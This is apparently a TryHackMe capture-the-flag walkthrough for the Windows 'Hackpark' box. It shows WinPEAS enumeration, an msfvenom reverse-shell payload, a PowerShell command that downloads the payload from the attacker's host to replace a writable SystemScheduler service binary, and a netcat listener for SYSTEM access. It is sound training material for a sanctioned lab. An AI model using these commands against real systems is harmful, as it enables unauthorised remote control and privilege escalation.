TryHackMe – My Hackpark Solution (No Metasploit!)

5/5 - (2 votes)

TryHackMe - My Hackpark Solution (No Metasploit!)

Watch this video on YouTube

CHALLENGE OVERVIEW

Link: hackpark
Difficulty: Medium
Target: user and root flags on a windows machine
Highlight: hijacking a system process to spawn a reverse shell
Tools: nmap, dirb, hydra, burpsuite, msfvenom
Tags: RCE (remote code execution), Windows, Winpeas

BACKGROUND

In this walkthrough, we will continue to build on our work in Hackpark I, but this time we will solve the box again without Metasploit.

The general approach will be to use winpeas to automate local enumeration of the server. We’ll review the results of winpeas and continue our privilege escalation by spoofing a system process and throwing an NT System Authority reverse shell (aka Windows root shell!).

Watching the first few minutes of the video might be a good review of Hackpark part I, because I quickly go through the final steps of the foothold stage below, starting with payload creation using msfvenom, and then I slow down again for the privilege escalation stage without using Metasploit.

ATTACK MAP

We’ll be picking up on the box from the alternative privesc attack vector shown below (Method 2)

SPIN UP AN FTP SERVER TO TRANSFER WINPEAS TO TARGET

Issue the following command to spin up a simple server from the directory that holds the winpeas.exe file:

python3 -m http.server

LOCAL RECON WITH WINPEAS

Run winpeas now:

winpeas.exe

TEST OUT THE AUTO-LOADING USER:PASS COMBO WITH REMOTE DESKTOP

Let’s follow up on Winpeas’ first interesting finding. We attempt to log in to the server using the remote desktop protocol (RDP) autologin credentials.

Unfortunately, this turns out to be a dead end. We’ll move on to other interesting findings

REVIEW INTERESTING FINDINGS

The other interesting finding from WinPEAS that jumps out at me is:

=========================
	WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
	File Permissions: Everyone [WriteData/CreateFiles]
	Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])
	System Scheduler Service Wrapper
========================================================================

It appears that there may be a DLL (dynamic link library) hijacking exploit opportunity with the windows system scheduler service.

The file is listed as being located in the folder: C:\Program Files (x86)\SystemScheduler. Let’s navigate there in our terminal to see what files might be running a service. On Windows, these files will usually .exe filetypes.

It looks like the Message.exe file might be the service we need to spoof.

Going forward, we will replace the file with our own malicious payload to spawn a reverse shell. We are hoping that the user NT SYSTEM AUTHORITY will be the one that runs the Message.exe file, so that the reverse shell will give us full root privileges.

CREATE A REVSHELL WITH MSFVENOM

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe

EXPLOIT THE MACHINE BY SPOOFING A WINDOWS SERVICE

Let’s copy payload.php over to the windows machine’s and rename it as Message.exe, and place it in the directory C:\Program Files (x86)\SystemScheduler in two easy steps:

Check to see if the simple HTTP server is still running on port 8000 of the attack machine in the folder that contains payload.exe. If the file location is different from the server, move payload.exe to the current folder that is being served.
Copy the file over to the target machine as Message.exe and place it in the correct SystemScheduler folder by issuing the following command on Windows:

powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 
'C:\Program Files (x86)\SystemScheduler\Message.exe'"

FIRE UP A NETCAT LISTENER TO CATCH THE REVSHELL

nc -lnvp 9999 (or whatever port you specified in the msfvenom reverse shell payload)

And now, waiting a few seconds, we should catch our revshell and confirm that we are Windows NT Authority. We can easily retrieve both flags now using the “type” command and finish off the box!

FINAL THOUGHTS

This box was one of the more challenging ones I’ve done yet.

It pushed me to chain together the use of several tools that I’ve used in more simple circumstances but never together. With each new hacking challenge completed, I am finding it easier to understand more complex attack vectors.

The details of decrypting hashes, copying files using HTTP servers, and searching for files and privilege escalation pathways on a target system might seem like a lot to grapple with, but with repetition comes familiarity and the logic of each attack starts to become more obvious.

Thanks for reading my walkthrough! Please let me know in the comments of the youtube video what you thought of today’s tutorial.

Benjamin Reitz

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.